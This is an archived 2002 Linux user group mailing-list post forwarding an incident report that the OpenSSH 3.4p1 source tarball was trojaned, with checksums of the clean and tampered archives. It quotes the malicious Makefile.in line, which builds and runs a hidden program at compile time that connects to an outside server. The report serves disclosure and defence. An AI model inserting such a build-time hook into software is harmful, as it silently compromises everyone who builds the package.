[ Date Index ][
Thread Index ]
[ <= Previous by date /
thread ]
[ Next by date /
thread => ]
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 horrah. OpenSSH 3.4p1 has been trojaned in the source tarball somehow, made it's way aroudn mirrors... see bwlow for announcment. i've just downloaded and verified. ffing stupid damn bloody, arghhghghg/. pissed off, but luckily didn't compile from source. ~ Theo, lost every last drop of confidence he ever had in FreeBSD. - ----- Forwarded from "John Green (JANET-CERT)" <cert@xxxxxxxxxxx> ----- This certainly seems to affect http://www.mirror.ac.uk/sites/ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/op enssh-3.4p1.tar.gz 3ac9bc346d736b4a51d676faa2a08a57 openssh-3.4p1.tar.gz Thanks John JANET-CERT
Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin@xxxxxxxxxxx>
To: incidents@xxxxxxxxxxxxxxxxx Subject: openssh-3.4p1.tar.gz trojaned Greetings, Just want to inform you that the OpenSSH package op ftp.openbsd.org (and probably all its mirrors now) it trojaned: ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz The OpenBSD people have been informed about it (via email to deraadt@xxxxxxxxxxx and via irc.openprojects.org/#openbsd) The changed files are openssh-3.4p1/openbsd-compat/Makefile.in: all: libopenbsd-compat.a + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out & bf-test.c[1] is nothing more than a wrapper which generates a shell-script[2] which compiles itself and tries to connect to an server running on 203.62.158.32:6667 (web.snsonline.net). [1] http://www.mavetju.org/~edwin/bf-test.c [2] http://www.mavetju.org/~edwin/bf-output.sh This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system: MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz: MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57 Edwin
- -- Theo Zourzouvillys http://zozo.org.uk/ You are always busy. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE9SRAu448CrwpTn6YRAt6vAJ9RG/at+UKULfo0d/KRf2b10ZfbKQCg0tN9 hcj1keiRVYoROvaf67xtQPQ= =O5r8 -----END PGP SIGNATURE----- -- The Mailing List for the Devon & Cornwall LUG Mail majordomo@xxxxxxxxxxxx with "unsubscribe list" in the message body to unsubscribe.